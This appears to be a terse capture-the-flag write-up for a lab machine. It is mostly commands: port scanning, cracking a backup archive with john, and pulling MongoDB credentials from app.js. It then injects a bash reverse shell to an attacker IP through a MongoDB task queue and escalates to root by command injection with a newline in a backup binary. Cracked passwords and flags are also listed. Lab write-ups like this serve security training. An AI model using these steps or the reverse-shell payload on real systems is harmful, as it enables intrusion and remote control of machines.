Information Gathering
IP Address | Open Ports |
---|---|
10.10.10.58 | TCP: 22, 3000 |
$ nmap -p- 10.10.10.58 --min-rate 1000 -sC -sV -Pn
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 dc:5e:34:a6:25:db:43:ec:eb:40:f4:96:7b:8e:d1:da (RSA)
| 256 6c:8e:5e:5f:4f:d5:41:7d:18:95:d1:dc:2e:3f:e5:9c (ECDSA)
|_ 256 d8:78:b8:5d:85:ff:ad:7b:e6:e2:b5:da:1e:52:62:36 (ED25519)
3000/tcp open hadoop-tasktracker Apache Hadoop
| hadoop-datanode-info:
|_ Logs: /login
|_http-title: MyPlace
| hadoop-tasktracker-info:
|_ Logs: /login
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
HTTP & Backup zip
http://10.10.10.58:3000/
http://10.10.10.58:3000/api/users/
https://crackstation.net/
http://10.10.10.58:3000/login
username:myP14ceAdm1nAcc0uNT,tom,mark,rastating
password:manchester,spongebob,snowflake,NULL
$ binwalk myplace.backup
$ cat myplace.backup | base64 -d > myplace.backup.decode
$ zip2john myplace.backup.decode -o myplace.backup.decode.john
$ john --wordlist=/usr/share/wordlists/rockyou.txt myplace.backup.decode.john
password:magicword
$ unzip myplace.backup.decode
$ cat var/www/myplace/app.js
mongodb://mark:5AYRft73VtFpc84k@localhost:27017/myplace?authMechanism=DEFAULT&authSource=myplace
TRP00F Skip Root
https://github.com/MartinxMax/trp00f
$ python3 trp00f.py --lhost 10.10.16.24 --lport 10033 --rhost 10.10.16.24 --rport 10034 --http 9999 --password '5AYRft73VtFpc84k'
mark to tom & MongoDB Task Injection
$ ssh mark@10.10.10.58
$ cat /var/www/myplace/app.js
This script connects to the Mongo database and then runs a set of commands every 30 seconds. It fetches items from the tasks collection; for each document it passes doc.cmd to exec to run it, then deletes the document.
$ mongo -u mark -p 5AYRft73VtFpc84k scheduler
> show collections
> db.tasks.insert({"cmd": "/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.16.24/10035 0>&1'"})
> db.tasks.find()
User.txt
b0ca19843af3d049a782f7f16b0cf144
Privilege Escalation & Command Injection
$ file /usr/local/bin/backup
The first argument accepts a -q option.
$ /usr/local/bin/backup -q "" '
/bin/bash'
Root.txt
2278ab816e1cd3204d1b331144bf9704